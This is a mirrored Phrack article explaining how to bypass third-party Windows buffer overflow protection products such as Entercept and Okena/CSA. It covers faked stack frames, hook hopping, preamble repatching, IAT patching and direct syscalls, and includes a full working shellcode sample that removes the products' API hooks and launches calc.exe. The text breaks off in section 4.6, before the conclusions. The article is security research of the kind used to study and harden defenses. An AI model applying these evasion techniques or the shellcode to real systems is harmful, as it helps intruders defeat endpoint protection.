mirror of
https://github.com/fdiskyou/Zines.git
synced 2025-03-09 00:00:00 +01:00
1069 lines
37 KiB
Text
1069 lines
37 KiB
Text
![]() |
==Phrack Inc.==
|
||
|
|
||
|
Volume 0x0b, Issue 0x3e, Phile #0x05 of 0x10
|
||
|
|
||
|
|
||
|
|=-----------------------------------------------------------------------=|
|
||
|
|=-----=[ Bypassing 3rd Party Windows Buffer Overflow Protection ]=------=|
|
||
|
|=-----------------------------------------------------------------------=|
|
||
|
|=--------------=[ anonymous <p62_wbo_a@author.phrack.org ]=-------------=|
|
||
|
|=--------------=[ Jamie Butler <james.butler@hbgary.com> ]=-------------=|
|
||
|
|=--------------=[ anonymous <p62_wbo_b@author.phrack.org ]=-------------=|
|
||
|
|
||
|
|
||
|
|
||
|
--[ Contents
|
||
|
|
||
|
|
||
|
1 - Introduction
|
||
|
|
||
|
2 - Stack Backtracing
|
||
|
|
||
|
3 - Evading Kernel Hooks
|
||
|
|
||
|
3.1 - Kernel Stack Backtracing
|
||
|
|
||
|
3.2 - Faking Stack Frames
|
||
|
|
||
|
4 - Evading Userland Hooks
|
||
|
|
||
|
4.1 - Implementation Problems - Incomplete API Hooking
|
||
|
|
||
|
4.1.1 - Not Hooking all API Versions
|
||
|
4.1.2 - Not Hooking Deeply Enough
|
||
|
4.1.3 - Not Hooking Thoroughly Enough
|
||
|
|
||
|
4.2 - Fun With Trampolines
|
||
|
|
||
|
4.2.1 Patch Table Jumping
|
||
|
4.2.2 Hook Hopping
|
||
|
|
||
|
4.3 - Repatching Win32 APIs
|
||
|
|
||
|
4.4 - Attacking Userland Components
|
||
|
|
||
|
4.4.1 IAT Patching
|
||
|
4.4.2 Data Section Patching
|
||
|
|
||
|
4.5 - Calling Syscalls Directly
|
||
|
|
||
|
4.6 - Faking Stack Frames
|
||
|
|
||
|
5 - Conclusions
|
||
|
|
||
|
|
||
|
|
||
|
--[ 1 - Introduction
|
||
|
|
||
|
Recently, a number of commercial security systems started to offer
|
||
|
protection against buffer overflows. This paper analyzes the protection
|
||
|
claims and describes several techniques to bypass the buffer overflow
|
||
|
protection.
|
||
|
|
||
|
Existing commercial systems implement a number of techniques to protect
|
||
|
against buffer overflows. Currently, stack backtracing is the most popular
|
||
|
one. It is also the easiest to implement and the easiest to bypass.
|
||
|
|
||
|
Several commercial products such as Entercept (now NAI Entercept) and
|
||
|
Okena (now Cisco Security Agent) implement this technique.
|
||
|
|
||
|
|
||
|
--[ 2 - Stack Backtracing
|
||
|
|
||
|
Most of the existing commercial security systems do not actually prevent
|
||
|
buffer overflows but rather try to attempt to detect the execution of
|
||
|
shellcode.
|
||
|
|
||
|
The most common technology used to detect shellcode is code page
|
||
|
permission checking which involves checking whether code is executing on
|
||
|
a writable page of memory. This is necessary since architectures such as
|
||
|
x86 do not support the non-executable memory bit.
|
||
|
|
||
|
Some systems also perform additional checking to see whether code's page
|
||
|
of memory belongs to a memory mapped file section and not to an anonymous
|
||
|
memory section.
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
page = get_page_from_addr( code_addr );
|
||
|
if (page->permissions & WRITABLE)
|
||
|
return BUFFER_OVERFLOW;
|
||
|
|
||
|
ret = page_originates_from_file( page );
|
||
|
if (ret != TRUE)
|
||
|
return BUFFER_OVERFLOW;
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
Pseudo code for code page permission checking
|
||
|
|
||
|
Buffer overflow protection technologies (BOPT) that rely on stack
|
||
|
backtracing don't actually create non-executable heap and stack segments.
|
||
|
Instead they hook the OS and check for shellcode execution during the
|
||
|
hooked API calls.
|
||
|
|
||
|
Most operating systems can be hooked in userland or in kernel.
|
||
|
|
||
|
Next section deals with evading kernel hooks, while section 4 deals with
|
||
|
bypassing userland hooks.
|
||
|
|
||
|
|
||
|
--[ 3 - Evading Kernel Hooks
|
||
|
|
||
|
When hooking the kernel, Host Intrusion Prevention Systems (HIPS) must
|
||
|
be able to detect where a userland API call originated. Due to
|
||
|
the heavy use of kernel32.dll and ntdll.dll libraries, an API call is
|
||
|
usually several stack frames away from the actual syscall trap call.
|
||
|
For this reason, some intrusion preventions systems rely on using stack
|
||
|
backtracing to locate the original caller of a system call.
|
||
|
|
||
|
|
||
|
----[ 3.1 - Kernel Stack Backtracing
|
||
|
|
||
|
While stack backtracing can occur from either userland or kernel, it is
|
||
|
far more important for the kernel components of a BOPT than its userland
|
||
|
components. The existing commercial BOPT's kernel components rely entirely
|
||
|
on stack backtracing to detect shellcode execution. Therefore, evading a
|
||
|
kernel hook is simply a matter of defeating the stack backtracing
|
||
|
mechanism.
|
||
|
|
||
|
Stack backtracing involves traversing stack frames and verifying that the
|
||
|
return addresses pass the buffer overflow detection tests described above.
|
||
|
Frequently, there is also an additional "return into libc" check, which
|
||
|
involves checking that a return address points to an instruction
|
||
|
immediately following a call or a jump. The basic operation of stack
|
||
|
backtracing code, as used by a BOPT, is presented below.
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
while (is_valid_frame_pointer( ebp )) {
|
||
|
ret_addr = get_ret_addr( ebp );
|
||
|
|
||
|
if (check_code_page(ret_addr) == BUFFER_OVERFLOW)
|
||
|
return BUFFER_OVERFLOW;
|
||
|
|
||
|
if (does_not_follow_call_or_jmp_opcode(ret_addr))
|
||
|
return BUFFER_OVERFLOW;
|
||
|
|
||
|
ebp = get_next_frame( ebp );
|
||
|
}
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
Pseudo code for BOPT stack backtracing
|
||
|
|
||
|
When discussing how to evade stack backtracing, it is important to
|
||
|
understand how stack backtracing works on an x86 architecture. A typical
|
||
|
stack frame looks as follows during a function call:
|
||
|
|
||
|
: :
|
||
|
|-------------------------|
|
||
|
| function B parameter #2 |
|
||
|
|-------------------------|
|
||
|
| function B parameter #1 |
|
||
|
|-------------------------|
|
||
|
| return EIP address |
|
||
|
|-------------------------|
|
||
|
| saved EBP |
|
||
|
|=========================|
|
||
|
| function A parameter #2 |
|
||
|
|-------------------------|
|
||
|
| function A parameter #1 |
|
||
|
|-------------------------|
|
||
|
| return EIP address |
|
||
|
|-------------------------|
|
||
|
| saved EBP |
|
||
|
|-------------------------|
|
||
|
: :
|
||
|
|
||
|
The EBP register points to the next stack frame. Without the EBP register
|
||
|
it is very hard, if not impossible, to correctly identify and trace
|
||
|
through all the stack frames.
|
||
|
|
||
|
Modern compilers often omit the use of EBP as a frame pointer and use it
|
||
|
as a general purpose register instead. With an EBP optimization, a stack
|
||
|
frame looks as follows during a function call:
|
||
|
|
||
|
|-----------------------|
|
||
|
| function parameter #2 |
|
||
|
|-----------------------|
|
||
|
| function parameter #1 |
|
||
|
|-----------------------|
|
||
|
| return EIP address |
|
||
|
|-----------------------|
|
||
|
|
||
|
Notice that the EBP register is not present on the stack. Without an EBP
|
||
|
register it is not possible for the buffer overflow detection technologies
|
||
|
to accurately perform stack backtracing. This makes their task incredibly
|
||
|
hard as a simple return into libc style attack will bypass the protection.
|
||
|
Simply originating an API call one layer higher than the BOPT hook defeats
|
||
|
the detection technique.
|
||
|
|
||
|
|
||
|
----[ 3.2 - Faking Stack Frames
|
||
|
|
||
|
Since the stack is under complete control of the shellcode, it is possible
|
||
|
to completely alter its contents prior to an API call. Specially crafted
|
||
|
stack frames can be used to bypass the buffer overflow detectors.
|
||
|
|
||
|
As was explained previously, the buffer overflow detector is looking for
|
||
|
three key indicators of legitimate code: read-only page permissions,
|
||
|
memory mapped file section and a return address pointing to an instruction
|
||
|
immediately following a call or jmp. Since function pointers change
|
||
|
calling semantics, BOPT do not (and cannot) check that a call or jmp
|
||
|
actually points to the API being called. Most importantly, the BOPT cannot
|
||
|
check return addresses beyond the last valid EBP frame pointer
|
||
|
(it cannot stack backtrace any further).
|
||
|
|
||
|
Evading a BOPT is therefore simply a matter of creating a "final" stack
|
||
|
frame which has a valid return address. This valid return address must
|
||
|
point to an instruction residing in a read-only memory mapped file section
|
||
|
and immediately following a call or jmp. Provided that the dummy return
|
||
|
address is reasonably close to a second return address, the shellcode can
|
||
|
easily regain control.
|
||
|
|
||
|
The ideal instruction sequence to point the dummy return address to is:
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
jmp [eax] ; or call [eax], or another register
|
||
|
dummy_return: ... ; some number of nops or easily
|
||
|
; reversed instructions, e.g. inc eax
|
||
|
ret ; any return will do, e.g. ret 8
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
|
||
|
Bypassing kernel BOPT components is easy because they must rely on user
|
||
|
controlled data (the stack) to determine the validity of an API call. By
|
||
|
correctly manipulating the stack, it is possible to prematurely terminate
|
||
|
the stack return address analysis.
|
||
|
|
||
|
This stack backtracing evasion technique is also effective against
|
||
|
userland hooks (see section 4.6).
|
||
|
|
||
|
|
||
|
--[ 4 - Evading Userland Hooks
|
||
|
|
||
|
Given the presence of the correct instruction sequence in a valid region
|
||
|
of memory, it is possible to trivially bypass kernel buffer overflow
|
||
|
protection techniques. Similar techniques can be used to bypass userland
|
||
|
BOPT components. In addition, since the shellcode executes with the same
|
||
|
permissions as the userland hooks, a number of other techniques can be
|
||
|
used to evade the detection.
|
||
|
|
||
|
|
||
|
----[ 4.1 - Implementation Problems - Incomplete API Hooking
|
||
|
|
||
|
There are many problems with the userland based buffer overflow protection
|
||
|
technologies. For example, they require the buffer overflow protection
|
||
|
code to be in the code path of all attacker's calls or the shellcode
|
||
|
execution will go undetected.
|
||
|
|
||
|
Trying to determine what an attacker will do with his or her shellcode
|
||
|
a priori is an extremely hard problem, if not an impossible one. Getting
|
||
|
on the right path is not easy. Some of the obstacles in the way include:
|
||
|
|
||
|
a. Not accounting for both UNICODE and ANSI versions of a Win32 API
|
||
|
call.
|
||
|
|
||
|
b. Not following the chaining nature of API calls. For example,
|
||
|
many functions in kernel32.dll are nothing more than wrappers for
|
||
|
other functions within kernel32.dll or ntdll.dll.
|
||
|
|
||
|
c. The constantly changing nature of the Microsoft Windows API.
|
||
|
|
||
|
|
||
|
--------[ 4.1.1 - Not Hooking All API Versions
|
||
|
|
||
|
A commonly encountered mistake with userland API hooking
|
||
|
implementations is incomplete code path coverage. In order for an API
|
||
|
interception based products to be effective, all APIs utilized by
|
||
|
attackers must be hooked. This requires the buffer overflow protection
|
||
|
technology to hook somewhere along the code path an attacker _has_ to
|
||
|
take. However, as will be shown, once an attacker has begun executing
|
||
|
code, it becomes very difficult for third party systems to cover all
|
||
|
code paths. Indeed, no tested commercial buffer overflow detector actually
|
||
|
provided an effective code path coverage.
|
||
|
|
||
|
Many Windows API functions have two versions: ANSI and UNICODE. The ANSI
|
||
|
function names usually end in A, and UNICODE functions end in W because
|
||
|
of their wide character nature. The ANSI functions are often nothing
|
||
|
more than wrappers that call the UNICODE version of the API. For example,
|
||
|
CreateFileA takes the ANSI file name that was passed as a parameter and
|
||
|
turns it into an UNICODE string. It then calls CreateFileW. Unless a
|
||
|
vendor hooks both the UNICODE and ANSI version of the API function, an
|
||
|
attacker can bypass the protection mechanism by simply calling the other
|
||
|
version of the function.
|
||
|
|
||
|
For example, Entercept 4.1 hooks LoadLibraryA, but it makes no attempt
|
||
|
to intercept LoadLibraryW. If a protection mechanism was only going to
|
||
|
hook one version of a function, it would make more sense to hook the
|
||
|
UNICODE version. For this particular function, Okena/CSA does a better
|
||
|
job by hooking LoadLibraryA, LoadLibraryW, LoadLibraryExA, and
|
||
|
LoadLibraryExW. Unfortunately for the third party buffer overflow
|
||
|
detectors, simply hooking more functions in kernel32.dll is not enough.
|
||
|
|
||
|
|
||
|
--------[ 4.1.2 - Not Hooking Deeply Enough
|
||
|
|
||
|
In Windows NT, kernel32.dll acts as a wrapper for ntdll.dll and yet many
|
||
|
buffer overflow detection products do not hook functions within ntdll.dll.
|
||
|
This simple error is similar to not hooking both the UNICODE and ANSI
|
||
|
versions of a function. An attacker can simply call the ntdll.dll directly
|
||
|
and completely bypass all the kernel32.dll "checkpoints" established by a
|
||
|
buffer overflow detector.
|
||
|
|
||
|
For example, NAI Entercept tries to detect shellcode calling
|
||
|
GetProcAddress() in kernel32.dll. However, the shellcode can be rewritten
|
||
|
to call LdrGetProcedureAddress() in ntdll.dll, which will accomplish the
|
||
|
same goal, and at the same time never pass through the NAI Entercept hook.
|
||
|
|
||
|
Similarly, shellcode can completely bypass userland hooks altogether and
|
||
|
make system calls directly (see section 4.5).
|
||
|
|
||
|
|
||
|
--------[ 4.1.3 - Not Hooking Thoroughly Enough
|
||
|
|
||
|
The interactions between the various different Win32 API functions is
|
||
|
byzantine, complex and difficult to understand. A vendor must make only
|
||
|
one mistake in order to create a window of opportunity for an attacker.
|
||
|
|
||
|
For example, Okena/CSA and NAI Entercept both hook WinExec trying to
|
||
|
prevent attacker's shellcode from spawning a process.
|
||
|
|
||
|
The call path for WinExec looks like this:
|
||
|
|
||
|
WinExec() --> CreateProcessA() --> CreateProcessInternalA()
|
||
|
|
||
|
Okena/CSA and NAI Entercept hook both WinExec() and CreateProcessA()
|
||
|
(see Appendix A and B). However, neither product hooks
|
||
|
CreateProcessInternalA() (exported by kernel32.dll). When writing a
|
||
|
shellcode, an attacker could find the export for
|
||
|
CreateProcessInternalA() and use it instead of calling WinExec().
|
||
|
|
||
|
CreateProcessA() pushes two NULLs onto the stack before calling
|
||
|
CreateProcessInternalA(). Thus a shellcode only needs to push two NULLs
|
||
|
and then call CreateProcessInternalA() directly to evade the userland
|
||
|
API hooks of both products.
|
||
|
|
||
|
As new DLLs and APIs are released, the complexity of Win32 API internal
|
||
|
interactions increases, making the problem worse. Third party product
|
||
|
vendors are at a severe disadvantage when implementing their buffer
|
||
|
overflow detection technologies and are bound to make mistakes which
|
||
|
can be exploited by attackers.
|
||
|
|
||
|
|
||
|
----[ 4.2 - Fun With Trampolines
|
||
|
|
||
|
Most Win32 API functions begin with a five byte preamble. First, EBP is
|
||
|
pushed onto the stack, then ESP is moved into EBP.
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Code Bytes Assembly
|
||
|
55 push ebp
|
||
|
8bec mov ebp, esp
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Both Okena/CSA and Entercept use inline function hooking. They overwrite
|
||
|
the first 5 bytes of a function with an immediate unconditional jump or
|
||
|
call. For example, this is what the first few bytes of WinExec() look like
|
||
|
after NAI Entercept's hooks have been installed:
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Code Bytes Assembly
|
||
|
e8 xx xx xx xx call xxxxxxxx
|
||
|
54 push esp
|
||
|
53 push ebx
|
||
|
56 push esi
|
||
|
57 push edi
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Alternatively, the first few bytes could be overwritten with a jump
|
||
|
instruction:
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Code Bytes Assembly
|
||
|
e9 xx xx xx xx jmp xxxxxxxx
|
||
|
...
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Obviously, it is easy for shellcode to test for these and other signatures
|
||
|
before calling a function. If a hijacking mechanism is detected, the
|
||
|
shellcode can use several different techniques to bypass the hook.
|
||
|
|
||
|
|
||
|
------[ 4.2.1 - Patch Table Jumping
|
||
|
|
||
|
When an API is hooked, the original preamble is saved into a table so that
|
||
|
the buffer overflow detector can recreate the original API after
|
||
|
performing its validation checks. The preamble is stored in a patch table,
|
||
|
which resides somewhere in the address space of an application. When
|
||
|
shellcode detects the presence of an API hook, it can simply search for
|
||
|
the patch table and make its calls to patch table entries. This
|
||
|
completely avoids the hook, preventing the userland buffer overflow
|
||
|
detector components from ever being in the attacker's call path.
|
||
|
|
||
|
|
||
|
------[ 4.2.2 - Hook Hopping
|
||
|
|
||
|
Alternatively, instead of locating the patch table, shellcode can include
|
||
|
its own copy of the original pre-hook preamble. After executing its own
|
||
|
API preamble, the shellcode can transfer execution to immediately after
|
||
|
the API hook (function address plus five bytes).
|
||
|
|
||
|
Since Intel x86 has variable length instructions, one must take this into
|
||
|
account in order to land on an even instruction boundary:
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
Shellcode:
|
||
|
call WinExecPreamble
|
||
|
|
||
|
WinExecPreamble:
|
||
|
push ebp
|
||
|
mov ebp, esp
|
||
|
sub esp, 54
|
||
|
jmp WinExec+6
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
This technique will not work if another function within the call path
|
||
|
is also hooked. In this case, Entercept also hooks CreateProcessA(),
|
||
|
which WinExec() calls. Thus, to evade detection shellcode should call
|
||
|
CreateProcessA() using the stored copy of CreateProcessA's preamble.
|
||
|
|
||
|
|
||
|
----[ 4.3 - Repatching Win32 APIs
|
||
|
|
||
|
Thoroughly hooking Win32 APIs is not effective when certain fundamental
|
||
|
errors are made in the implementation of a userland buffer overflow
|
||
|
detection component.
|
||
|
|
||
|
Certain implementations (NAI Entercept) have a serious problem with the
|
||
|
way they perform their API hooking. In order to be able to overwrite
|
||
|
preambles of hooked functions, the code section for a DLL has to be made
|
||
|
writable. Entercept marks code sections of kernel32.dll and ntdll.dll as
|
||
|
writable in order to be able to modify their contents. However, Entercept
|
||
|
never resets the writable bit!
|
||
|
|
||
|
Due to this serious security flaw, it is possible for an attacker to
|
||
|
overwrite the API hook by re-injecting the original preamble code. For
|
||
|
the WinExec() and CreateProcessA() examples, this would require
|
||
|
overwriting the first 6 bytes (just to be instruction aligned) of
|
||
|
WinExec() and CreateProcessA() with the original preamble.
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
WinExecOverWrite:
|
||
|
Code Bytes Assembly
|
||
|
55 push ebp
|
||
|
8bec mov ebp, esp
|
||
|
83ec54 sub esp, 54
|
||
|
|
||
|
CreateProcessAOverWrite:
|
||
|
Code Bytes Assembly
|
||
|
55 push ebp
|
||
|
8bec mov ebp, esp
|
||
|
ff752c push DWORD PTR [ebp+2c]
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
This technique will not work against properly implemented buffer overflow
|
||
|
detectors, however it is very effective against NAI Entercept. A complete
|
||
|
shellcode example which overwrites the NAI Entercept hooks is presented
|
||
|
below:
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
// This sample code overwrites the preamble of WinExec and
|
||
|
// CreateProcessA to avoid detection. The code then
|
||
|
// calls WinExec with a "calc.exe" parameter.
|
||
|
// The code demonstrates that by overwriting function
|
||
|
// preambles, it is able to evade Entercept and Okena/CSA
|
||
|
// buffer overflow protection.
|
||
|
|
||
|
_asm {
|
||
|
pusha
|
||
|
|
||
|
jmp JUMPSTART
|
||
|
START:
|
||
|
pop ebp
|
||
|
xor eax, eax
|
||
|
mov al, 0x30
|
||
|
mov eax, fs:[eax];
|
||
|
mov eax, [eax+0xc];
|
||
|
|
||
|
// We now have the module_item for ntdll.dll
|
||
|
mov eax, [eax+0x1c]
|
||
|
|
||
|
// We now have the module_item for kernel32.dll
|
||
|
mov eax, [eax]
|
||
|
|
||
|
// Image base of kernel32.dll
|
||
|
mov eax, [eax+0x8]
|
||
|
|
||
|
movzx ebx, word ptr [eax+3ch]
|
||
|
|
||
|
// pe.oheader.directorydata[EXPORT=0]
|
||
|
mov esi, [eax+ebx+78h]
|
||
|
lea esi, [eax+esi+18h]
|
||
|
|
||
|
// EBX now has the base module address
|
||
|
mov ebx, eax
|
||
|
lodsd
|
||
|
|
||
|
// ECX now has the number of function names
|
||
|
mov ecx, eax
|
||
|
lodsd
|
||
|
add eax,ebx
|
||
|
|
||
|
// EDX has addresses of functions
|
||
|
mov edx,eax
|
||
|
|
||
|
lodsd
|
||
|
|
||
|
// EAX has address of names
|
||
|
add eax,ebx
|
||
|
|
||
|
// Save off the number of named functions
|
||
|
// for later
|
||
|
push ecx
|
||
|
|
||
|
// Save off the address of the functions
|
||
|
push edx
|
||
|
|
||
|
RESETEXPORTNAMETABLE:
|
||
|
xor edx, edx
|
||
|
|
||
|
INITSTRINGTABLE:
|
||
|
mov esi, ebp // Beginning of string table
|
||
|
inc esi
|
||
|
|
||
|
MOVETHROUGHTABLE:
|
||
|
mov edi, [eax+edx*4]
|
||
|
add edi, ebx // EBX has the process base address
|
||
|
|
||
|
xor ecx, ecx
|
||
|
mov cl, BYTE PTR [ebp]
|
||
|
test cl, cl
|
||
|
jz DONESTRINGSEARCH
|
||
|
|
||
|
|
||
|
STRINGSEARCH: // ESI points to the function string table
|
||
|
repe cmpsb
|
||
|
je Found
|
||
|
|
||
|
// The number of named functions is on the stack
|
||
|
cmp [esp+4], edx
|
||
|
je NOTFOUND
|
||
|
inc edx
|
||
|
jmp INITSTRINGTABLE
|
||
|
Found:
|
||
|
pop ecx
|
||
|
shl edx, 2
|
||
|
add edx, ecx
|
||
|
mov edi, [edx]
|
||
|
add edi, ebx
|
||
|
push edi
|
||
|
push ecx
|
||
|
xor ecx, ecx
|
||
|
mov cl, BYTE PTR [ebp]
|
||
|
inc ecx
|
||
|
add ebp, ecx
|
||
|
jmp RESETEXPORTNAMETABLE
|
||
|
|
||
|
DONESTRINGSEARCH:
|
||
|
OverWriteCreateProcessA:
|
||
|
pop edi
|
||
|
pop edi
|
||
|
push 0x06
|
||
|
pop ecx
|
||
|
inc esi
|
||
|
rep movsb
|
||
|
|
||
|
OverWriteWinExec:
|
||
|
pop edi
|
||
|
push edi
|
||
|
push 0x06
|
||
|
pop ecx
|
||
|
inc esi
|
||
|
rep movsb
|
||
|
|
||
|
CallWinExec:
|
||
|
push 0x03
|
||
|
push esi
|
||
|
call [esp+8]
|
||
|
|
||
|
NOTFOUND:
|
||
|
pop edx
|
||
|
STRINGEXIT:
|
||
|
pop ecx
|
||
|
popa;
|
||
|
jmp EXIT
|
||
|
|
||
|
JUMPSTART:
|
||
|
add esp, 0x1000
|
||
|
call START
|
||
|
WINEXEC:
|
||
|
_emit 0x07
|
||
|
_emit 'W'
|
||
|
_emit 'i'
|
||
|
_emit 'n'
|
||
|
_emit 'E'
|
||
|
_emit 'x'
|
||
|
_emit 'e'
|
||
|
_emit 'c'
|
||
|
CREATEPROCESSA:
|
||
|
_emit 0x0e
|
||
|
_emit 'C'
|
||
|
_emit 'r'
|
||
|
_emit 'e'
|
||
|
_emit 'a'
|
||
|
_emit 't'
|
||
|
_emit 'e'
|
||
|
_emit 'P'
|
||
|
_emit 'r'
|
||
|
_emit 'o'
|
||
|
_emit 'c'
|
||
|
_emit 'e'
|
||
|
_emit 's'
|
||
|
_emit 's'
|
||
|
_emit 'A'
|
||
|
ENDOFTABLE:
|
||
|
_emit 0x00
|
||
|
|
||
|
WinExecOverWrite:
|
||
|
_emit 0x06
|
||
|
_emit 0x55
|
||
|
_emit 0x8b
|
||
|
_emit 0xec
|
||
|
_emit 0x83
|
||
|
_emit 0xec
|
||
|
_emit 0x54
|
||
|
CreateProcessAOverWrite:
|
||
|
_emit 0x06
|
||
|
_emit 0x55
|
||
|
_emit 0x8b
|
||
|
_emit 0xec
|
||
|
_emit 0xff
|
||
|
_emit 0x75
|
||
|
_emit 0x2c
|
||
|
COMMAND:
|
||
|
_emit 'c'
|
||
|
_emit 'a'
|
||
|
_emit 'l'
|
||
|
_emit 'c'
|
||
|
_emit '.'
|
||
|
_emit 'e'
|
||
|
_emit 'x'
|
||
|
_emit 'e'
|
||
|
_emit 0x00
|
||
|
|
||
|
EXIT:
|
||
|
_emit 0x90
|
||
|
|
||
|
// Normally call ExitThread or something here
|
||
|
_emit 0x90
|
||
|
}
|
||
|
|
||
|
[-----------------------------------------------------------]
|
||
|
|
||
|
|
||
|
----[ 4.4 - Attacking Userland Components
|
||
|
|
||
|
While evading the hooks and techniques used by userland buffer overflow
|
||
|
detector components is effective, there exist other mechanisms of
|
||
|
bypassing the detection. Because both the shellcode and the buffer
|
||
|
overflow detector are executing with the same privileges and in the same
|
||
|
address space, it is possible for shellcode to directly attack the
|
||
|
buffer overflow detector userland component.
|
||
|
|
||
|
Essentially, when attacking the buffer overflow detector userland
|
||
|
component the attacker is attempting to subvert the mechanism used to
|
||
|
perform the shellcode detection check. There are only two principle
|
||
|
techniques for shellcode validation checking. Either the data used for the
|
||
|
check is determined dynamically during each hooked API call, or the data
|
||
|
is gathered at process start up and then checked during each call.
|
||
|
In either case, it is possible for an attacker to subvert the process.
|
||
|
|
||
|
|
||
|
------[ 4.4.1 - IAT Patching
|
||
|
|
||
|
Rather than implementing their own versions of memory page information
|
||
|
functions, the commercial buffer overflow protection products simply use
|
||
|
the operating system APIs. In Windows NT, these are implemented in
|
||
|
ntdll.dll. These APIs will be imported into the userland component
|
||
|
(itself a DLL) via its PE Import Table. An attacker can patch vectors
|
||
|
within the import table to alter the location of an API to a function
|
||
|
supplied by the shellcode. By supplying the function used to do the
|
||
|
validation checking by the buffer overflow detector, it is trivial for
|
||
|
an attacker to evade detection.
|
||
|
|
||
|
|
||
|
------[ 4.4.2 - Data Section Patching
|
||
|
|
||
|
For various reasons, a buffer overflow detector might use a pre-built
|
||
|
list of page permissions within the address space. When this is the
|
||
|
case, altering the address of the VirtualQuery() API is not effective.
|
||
|
To subvert the buffer overflow detector, the shellcode has to locate and
|
||
|
modify the data table used by the return address validation routines.
|
||
|
This is a fairly straightforward, although application specific, technique
|
||
|
for subverting buffer overflow prevention technologies.
|
||
|
|
||
|
|
||
|
----[ 4.5 - Calling Syscalls Directly
|
||
|
|
||
|
As mentioned above, rather than using ntdll.dll APIs to make system
|
||
|
calls, it is possible for an attacker to create shellcode which makes
|
||
|
system call directly. While this technique is very effective against
|
||
|
userland components, it obviously cannot be used to bypass kernel based
|
||
|
buffer overflow detectors.
|
||
|
|
||
|
To take advantage of this technique you must understand what parameters a
|
||
|
kernel function uses. These may not always be the same as the parameters
|
||
|
required by the kernel32 or ntdll API versions.
|
||
|
|
||
|
Also, you must know the system call number of the function in question.
|
||
|
You can find this dynamically using a technique similar to the one to find
|
||
|
function addresses. Once you have the address of the ntdll.dll version of
|
||
|
the function you want to call, index into the function one byte and read
|
||
|
the following DWORD. This is the system call number in the system call
|
||
|
table for the function. This is a common trick used by rootkit developers.
|
||
|
|
||
|
Here is the pseudo code for calling NtReadFile system call directly:
|
||
|
|
||
|
...
|
||
|
xor eax, eax
|
||
|
|
||
|
// Optional Key
|
||
|
push eax
|
||
|
// Optional pointer to large integer with the file offset
|
||
|
push eax
|
||
|
|
||
|
push Length_of_Buffer
|
||
|
push Address_of_Buffer
|
||
|
|
||
|
// Before call make room for two DWORDs called the IoStatusBlock
|
||
|
push Address_of_IoStatusBlock
|
||
|
|
||
|
// Optional ApcContext
|
||
|
push eax
|
||
|
// Optional ApcRoutine
|
||
|
push eax
|
||
|
// Optional Event
|
||
|
push eax
|
||
|
|
||
|
// Required file handle
|
||
|
push hFile
|
||
|
|
||
|
// EAX must contain the system call number
|
||
|
mov eax, Found_Sys_Call_Num
|
||
|
|
||
|
// EDX needs the address of the userland stack
|
||
|
lea edx, [esp]
|
||
|
|
||
|
// Trap into the kernel
|
||
|
// (recent Windows NT versions use "sysenter" instead)
|
||
|
int 2e
|
||
|
|
||
|
|
||
|
----[ 4.6 - Faking Stack Frames
|
||
|
|
||
|
As described in section 3.2, kernel based stack backtracing can be
|
||
|
bypassed using fake frames. Same techniques works against userland based
|
||
|
detectors.
|
||
|
|
||
|
To bypass both userland and kernel backtracing, shellcode can create a
|
||
|
fake stack frame without the ebp register on stack. Since stack
|
||
|
backtracing relies on the presence of the ebp register to find the next
|
||
|
stack frame, fake frames can stop backtracing code from tracing past
|
||
|
the fake frame.
|
||
|
|
||
|
Of course, generating a fake stack frame is not going to work when the
|
||
|
EIP register still points to shellcode which resides in a writable
|
||
|
memory segment. To bypass the protection code, shellcode needs to use
|
||
|
an address that lies in a non-writable memory segment. This presents
|
||
|
a problem since shellcode needs a way to eventually regain control of
|
||
|
the execution.
|
||
|
|
||
|
The trick to regaining control is to proxy the return to shellcode
|
||
|
through a "ret" instruction which resides in a non-writable memory
|
||
|
segment. "ret" instruction can be found dynamically by searching memory
|
||
|
for a 0xC3 opcode.
|
||
|
|
||
|
Here is an illustration of a normal LoadLibrary("kernel32.dll") call
|
||
|
that originates from a writable memory segment:
|
||
|
|
||
|
|
||
|
push kernel32_string
|
||
|
call LoadLibrary
|
||
|
|
||
|
return_eip:
|
||
|
|
||
|
|
||
|
.
|
||
|
.
|
||
|
.
|
||
|
|
||
|
LoadLibrary: ; * see below for a stack illustration
|
||
|
|
||
|
.
|
||
|
.
|
||
|
.
|
||
|
ret ; return to stack-based return_eip
|
||
|
|
||
|
|
||
|
|
||
|
|------------------------------|
|
||
|
| address of "kernel32.dll" str|
|
||
|
|------------------------------|
|
||
|
| return address (return_eip) |
|
||
|
|------------------------------|
|
||
|
|
||
|
|
||
|
As explained before, the buffer overflow protection code executes before
|
||
|
LoadLibrary gets to run. Since the return address (return_eip) is in a
|
||
|
writable memory segment, the protection code logs the overflow
|
||
|
and terminates the process.
|
||
|
|
||
|
Next example illustrates 'proxy through a "ret" instruction' technique:
|
||
|
|
||
|
|
||
|
push return_eip
|
||
|
push kernel32_string
|
||
|
|
||
|
; fake "call LoadLibrary" call
|
||
|
push address_of_ret_instruction
|
||
|
jmp LoadLibrary
|
||
|
|
||
|
return_eip:
|
||
|
|
||
|
|
||
|
.
|
||
|
.
|
||
|
.
|
||
|
|
||
|
LoadLibrary: ; * see below for a stack illustration
|
||
|
|
||
|
.
|
||
|
.
|
||
|
.
|
||
|
ret ; return to non stack-based address_of_ret_instruction
|
||
|
|
||
|
|
||
|
|
||
|
|
||
|
address_of_ret_instruction:
|
||
|
|
||
|
.
|
||
|
.
|
||
|
.
|
||
|
ret ; return to stack-based return_eip
|
||
|
|
||
|
|
||
|
|
